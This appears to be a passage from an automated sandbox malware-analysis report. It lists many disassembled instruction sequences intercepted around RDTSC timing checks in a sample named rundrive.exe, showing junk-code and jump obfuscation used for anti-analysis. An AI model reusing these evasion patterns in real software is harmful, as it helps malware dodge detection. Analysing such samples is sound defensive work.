                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49505F5 second address: 49505FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49505FB second address: 49505FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49505FF second address: 4930654 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c jmp 00007FDA80C026C0h 0x00000011 jmp dword ptr [759811CCh] 0x00000017 mov edi, edi 0x00000019 push ebp 0x0000001a mov ebp, esp 0x0000001c mov eax, dword ptr [ebp+08h] 0x0000001f sub esp, 1Ch 0x00000022 test eax, eax 0x00000024 je 00007FDA80C0274Eh 0x0000002a mov eax, dword ptr fs:[00000030h] 0x00000030 mov eax, dword ptr [eax+08h] 0x00000033 mov esp, ebp 0x00000035 pop ebp 0x00000036 retn 0004h 0x00000039 mov dword ptr [ebp-04h], eax 0x0000003c mov dword ptr [ebp-48h], 00000000h 0x00000043 mov eax, dword ptr [ebp+08h] 0x00000046 mov dword ptr [ebp-44h], eax 0x00000049 mov dword ptr [ebp-40h], 00000000h 0x00000050 mov dword ptr [ebp-3Ch], 00000000h 0x00000057 mov eax, dword ptr [ebp-04h] 0x0000005a mov dword ptr [ebp-38h], eax 0x0000005d mov dword ptr [ebp-28h], 00000000h 0x00000064 lea eax, dword ptr [ebp-0000024Ch] 0x0000006a mov dword ptr [ebp-24h], eax 0x0000006d push 00007F04h 0x00000072 push 00000000h 0x00000074 call 00007FDA80C04277h 0x00000079 jmp 00007FDA8512FBAFh 0x0000007e mov edi, edi 0x00000080 pushad 0x00000081 push eax 0x00000082 push edx 0x00000083 pushfd 0x00000084 jmp 00007FDA80C026C9h 0x00000089 jmp 00007FDA80C026BBh 0x0000008e popfd 0x0000008f rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4930654 second address: 493068C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FDA80C00884h 0x0000000c or ecx, 0F2973B8h 0x00000012 jmp 00007FDA80C0087Bh 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f mov si, di 0x00000022 popad 0x00000023 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 493068C second address: 4930693 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4930693 second address: 49306B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FDA80C0087Bh 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push edx 0x00000012 pop ecx 0x00000013 mov si, di 0x00000016 popad 0x00000017 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49306B0 second address: 49306B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49306B6 second address: 49306BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49306BA second address: 4930700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FDA80C026BEh 0x0000000f xchg eax, ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FDA80C026BDh 0x00000019 xor esi, 62216116h 0x0000001f jmp 00007FDA80C026C1h 0x00000024 popfd 0x00000025 mov bx, ax 0x00000028 popad 0x00000029 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4930700 second address: 4930719 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C0087Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov bx, BB50h 0x00000011 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4930719 second address: 4930760 instructions: 0x00000000 rdtsc 0x00000002 movsx edx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ecx 0x00000009 jmp 00007FDA80C026BCh 0x0000000e xchg eax, edi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007FDA80C026BDh 0x00000017 pushfd 0x00000018 jmp 00007FDA80C026C0h 0x0000001d adc al, FFFFFFF8h 0x00000020 jmp 00007FDA80C026BBh 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4930760 second address: 4930766 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4930766 second address: 493076A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 493076A second address: 493076E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 493076E second address: 4930792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a movzx eax, bx 0x0000000d mov esi, ebx 0x0000000f popad 0x00000010 xchg eax, edi 0x00000011 jmp 00007FDA80C026BBh 0x00000016 sub edi, edi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4930792 second address: 4930798 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4930798 second address: 49307F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test dword ptr [ebp+0Ch], FFFF0000h 0x00000010 jmp 00007FDA80C026C6h 0x00000015 jne 00007FDAF1D7165Dh 0x0000001b pushad 0x0000001c mov esi, 0B1259ADh 0x00000021 movzx ecx, di 0x00000024 popad 0x00000025 mov edx, dword ptr [ebp+0Ch] 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FDA80C026C0h 0x0000002f rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49307F1 second address: 4930803 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDA80C0087Eh 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4930803 second address: 4930876 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FDA80C026C3h 0x00000013 adc ecx, 43BD27EEh 0x00000019 jmp 00007FDA80C026C9h 0x0000001e popfd 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 jmp 00007FDA80C026BEh 0x00000027 popad 0x00000028 call 00007FDA80C026B9h 0x0000002d jmp 00007FDA80C026C0h 0x00000032 push eax 0x00000033 pushad 0x00000034 mov ecx, ebx 0x00000036 push ebx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4930876 second address: 4930886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4930886 second address: 493088A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 493088A second address: 4930890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4930890 second address: 4930896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4930896 second address: 493089A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 493089A second address: 49308B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDA80C026BCh 0x00000011 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49308B2 second address: 49308EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 82D4h 0x00000007 pushfd 0x00000008 jmp 00007FDA80C0087Dh 0x0000000d sbb cl, FFFFFF96h 0x00000010 jmp 00007FDA80C00881h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov ah, 12h 0x00000022 push edi 0x00000023 pop esi 0x00000024 popad 0x00000025 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49501F8 second address: 4950218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, dx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push esi 0x0000000f pop edx 0x00000010 call 00007FDA80C026BEh 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4950218 second address: 4950267 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop ebx 0x00000005 mov eax, 106F4639h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push dword ptr [ebp+34h] 0x00000010 jmp 00007FDA80C00884h 0x00000015 mov ecx, dword ptr [ebp+08h] 0x00000018 jmp 00007FDA80C00880h 0x0000001d push dword ptr [ebp+30h] 0x00000020 pushad 0x00000021 call 00007FDA80C0087Eh 0x00000026 mov bh, cl 0x00000028 pop ebx 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4950267 second address: 49502BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA80C026C8h 0x00000009 popad 0x0000000a popad 0x0000000b push dword ptr [ebp+2Ch] 0x0000000e jmp 00007FDA80C026C0h 0x00000013 push dword ptr [ebp+28h] 0x00000016 pushad 0x00000017 mov dx, ax 0x0000001a push eax 0x0000001b push edx 0x0000001c call 00007FDA80C026C8h 0x00000021 pop esi 0x00000022 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49502BA second address: 49502FC instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FDA80C0087Bh 0x00000008 xor si, CEAEh 0x0000000d jmp 00007FDA80C00889h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 push dword ptr [ebp+24h] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FDA80C0087Dh 0x00000020 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49502FC second address: 495034E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FDA80C026BAh 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push dword ptr [ebp+20h] 0x0000000f jmp 00007FDA80C026C1h 0x00000014 push dword ptr [ebp+1Ch] 0x00000017 jmp 00007FDA80C026BEh 0x0000001c push dword ptr [ebp+18h] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FDA80C026C7h 0x00000026 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 495034E second address: 4950353 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4950353 second address: 4950366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, di 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push dword ptr [ebp+14h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4950366 second address: 495036A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 495036A second address: 495036E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 495036E second address: 4950374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49202DD second address: 4920315 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FDA80C026BDh 0x00000008 and cl, 00000066h 0x0000000b jmp 00007FDA80C026C1h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FDA80C026BDh 0x0000001c rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4920315 second address: 4920349 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C00881h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushfd 0x0000000f jmp 00007FDA80C0087Ah 0x00000014 xor cl, 00000068h 0x00000017 jmp 00007FDA80C0087Bh 0x0000001c popfd 0x0000001d rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4920349 second address: 492038C instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 6F29285Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dx, si 0x0000000c popad 0x0000000d mov ecx, dword ptr [ebp+08h] 0x00000010 jmp 00007FDA80C026BEh 0x00000015 xchg eax, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 call 00007FDA80C026BDh 0x0000001e pop esi 0x0000001f call 00007FDA80C026C1h 0x00000024 pop eax 0x00000025 popad 0x00000026 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 492038C second address: 49203A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C0087Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ecx, edx 0x0000000d push eax 0x0000000e push edx 0x0000000f mov dh, 78h 0x00000011 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49203E6 second address: 4920468 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b pushad 0x0000000c push eax 0x0000000d mov bh, D3h 0x0000000f pop ecx 0x00000010 mov ax, bx 0x00000013 popad 0x00000014 mov ecx, esi 0x00000016 jmp 00007FDA80C026C7h 0x0000001b or ecx, edx 0x0000001d jmp 00007FDA80C026C6h 0x00000022 je 00007FDAF1D6679Eh 0x00000028 pushad 0x00000029 call 00007FDA80C026BEh 0x0000002e movzx esi, bx 0x00000031 pop edi 0x00000032 jmp 00007FDA80C026BCh 0x00000037 popad 0x00000038 mov eax, dword ptr [esi+00000088h] 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 mov edi, eax 0x00000043 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4920468 second address: 49204A5 instructions: 0x00000000 rdtsc 0x00000002 mov di, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 mov bx, 44D6h 0x0000000c pop edi 0x0000000d popad 0x0000000e or eax, dword ptr [esi+0000008Ch] 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushfd 0x00000018 jmp 00007FDA80C00886h 0x0000001d xor cl, FFFFFFF8h 0x00000020 jmp 00007FDA80C0087Bh 0x00000025 popfd 0x00000026 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49402FB second address: 49402FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49402FF second address: 4940305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4940305 second address: 494031C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDA80C026C3h 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 494031C second address: 49403B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FDA80C00885h 0x0000000f mov edx, dword ptr [ebp+10h] 0x00000012 pushad 0x00000013 mov eax, 7BA557F3h 0x00000018 pushfd 0x00000019 jmp 00007FDA80C00888h 0x0000001e or si, CCF8h 0x00000023 jmp 00007FDA80C0087Bh 0x00000028 popfd 0x00000029 popad 0x0000002a sub esp, 20h 0x0000002d jmp 00007FDA80C00886h 0x00000032 mov ecx, dword ptr [ebp+14h] 0x00000035 jmp 00007FDA80C00880h 0x0000003a mov eax, edx 0x0000003c jmp 00007FDA80C00880h 0x00000041 or eax, ecx 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 mov edi, eax 0x00000048 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49403B4 second address: 494040D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FDA80C026C8h 0x00000008 or ecx, 1866EC18h 0x0000000e jmp 00007FDA80C026BBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushfd 0x00000019 jmp 00007FDA80C026C6h 0x0000001e or si, 5678h 0x00000023 jmp 00007FDA80C026BBh 0x00000028 popfd 0x00000029 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 494040D second address: 4940440 instructions: 0x00000000 rdtsc 0x00000002 mov dx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a mov esi, 4C366FA7h 0x0000000f pushfd 0x00000010 jmp 00007FDA80C0087Ch 0x00000015 or cl, FFFFFFD8h 0x00000018 jmp 00007FDA80C0087Bh 0x0000001d popfd 0x0000001e popad 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4940440 second address: 4940444 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4940444 second address: 494044A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 494044A second address: 4940450 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4940450 second address: 4940454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4940454 second address: 4940458 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4940458 second address: 494047C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007FDA80C0087Bh 0x0000000e mov esi, FFFE0000h 0x00000013 pushad 0x00000014 mov bx, si 0x00000017 pushad 0x00000018 mov si, C9BDh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 494047C second address: 494049F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, edi 0x00000007 pushad 0x00000008 mov al, D3h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDA80C026C7h 0x00000011 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 494049F second address: 49404DF instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FDA80C00888h 0x00000008 adc eax, 2ADE3728h 0x0000000e jmp 00007FDA80C0087Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FDA80C0087Bh 0x00000021 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49404DF second address: 49404E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49404E3 second address: 49404E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49404E9 second address: 4940548 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b pushad 0x0000000c mov cx, 6293h 0x00000010 pushfd 0x00000011 jmp 00007FDA80C026C8h 0x00000016 and cx, 7F18h 0x0000001b jmp 00007FDA80C026BBh 0x00000020 popfd 0x00000021 popad 0x00000022 mov bl, al 0x00000024 popad 0x00000025 test esi, eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FDA80C026BEh 0x0000002e rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4940548 second address: 49405A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDA80C00881h 0x00000008 mov dx, si 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jne 00007FDAF1D5BCF5h 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FDA80C00888h 0x0000001b xor esi, 4A841308h 0x00000021 jmp 00007FDA80C0087Bh 0x00000026 popfd 0x00000027 push ecx 0x00000028 movsx ebx, si 0x0000002b pop ecx 0x0000002c popad 0x0000002d mov esi, dword ptr fs:[00000018h] 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49405A6 second address: 4940690 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FDA80C026C9h 0x00000008 jmp 00007FDA80C026BBh 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FDA80C026C6h 0x00000017 sbb al, FFFFFFF8h 0x0000001a jmp 00007FDA80C026BBh 0x0000001f popfd 0x00000020 jmp 00007FDA80C026C8h 0x00000025 popad 0x00000026 popad 0x00000027 mov eax, dword ptr [esi+00000FDCh] 0x0000002d jmp 00007FDA80C026C0h 0x00000032 test eax, eax 0x00000034 jmp 00007FDA80C026C0h 0x00000039 jns 00007FDA80C026EAh 0x0000003f jmp 00007FDA80C026C0h 0x00000044 add esi, eax 0x00000046 pushad 0x00000047 pushfd 0x00000048 jmp 00007FDA80C026BEh 0x0000004d xor cl, 00000018h 0x00000050 jmp 00007FDA80C026BBh 0x00000055 popfd 0x00000056 mov ch, 05h 0x00000058 popad 0x00000059 mov eax, dword ptr [esi+000008B0h] 0x0000005f jmp 00007FDA80C026BBh 0x00000064 or eax, dword ptr [esi+000008B4h] 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e pushad 0x0000006f popad 0x00000070 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4940690 second address: 49406AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C00887h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
